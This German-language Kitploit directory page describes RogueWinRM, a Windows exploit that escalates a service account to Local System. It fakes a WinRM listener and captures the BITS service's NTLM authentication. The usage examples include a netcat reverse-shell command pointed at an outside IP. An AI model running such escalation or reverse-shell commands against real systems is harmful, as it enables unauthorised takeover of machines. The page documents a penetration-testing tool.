Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RogueWinRM — Windows Lokale Privilegienerweiterung von einem Dienstkonto zum System | Kitploit
Tools/GitHubGitHub/antoniococo/roguewinrm
Privilege EscalationExploitationPenetrationstests
GitHubantoniococo/roguewinrm

RogueWinRM

Windows Lokale Privilegienerweiterung von einem Dienstkonto zum System

Repository anzeigen
964112vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RogueWinRM

RogueWinRM ist ein lokaler Privilegienausweitungs-Exploit, der es ermöglicht, von einem Dienstkonto (mit SeImpersonatePrivilege) zum Local System-Konto zu eskalieren, wenn der WinRM-Dienst nicht läuft (standardmäßig unter Win10, aber NICHT unter Windows Server 2019).

Kurz gesagt, es horcht auf eingehende Verbindungen auf Port 5985 und gibt vor, ein echter WinRM-Dienst zu sein.
Es ist nur ein minimaler Webserver, der versucht, eine NTLM-Authentifizierung mit jedem Dienst auszuhandeln, der versucht, sich auf diesem Port zu verbinden.
Dann wird der BITS-Dienst (der als Local System läuft) ausgelöst und versucht, sich bei unserem betrügerischen Listener zu authentifizieren. Sobald er sich bei unserem Listener authentifiziert hat, können wir den Local System-Benutzer imitieren und einen beliebigen Prozess mit diesen Privilegien starten.

Eine vollständige technische Beschreibung dieser Schwachstelle finden Sie unter diesem Link --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

Verwendung

root@kitploit:~
RogueWinRM

Mandatory args:
-p <program>: program to launch

Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Beispiele

RogueWinRM

Ausführen einer interaktiven cmd:

root@kitploit:~
RogueWinRM.exe -p C:\windows\system32\cmd.exe

Ausführen einer Netcat-Reverse-Shell:

root@kitploit:~
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

Autoren

  • Antonio Cocomazzi
  • Andrea Pierini
  • Roberto (0xea31)
Tool herunterladen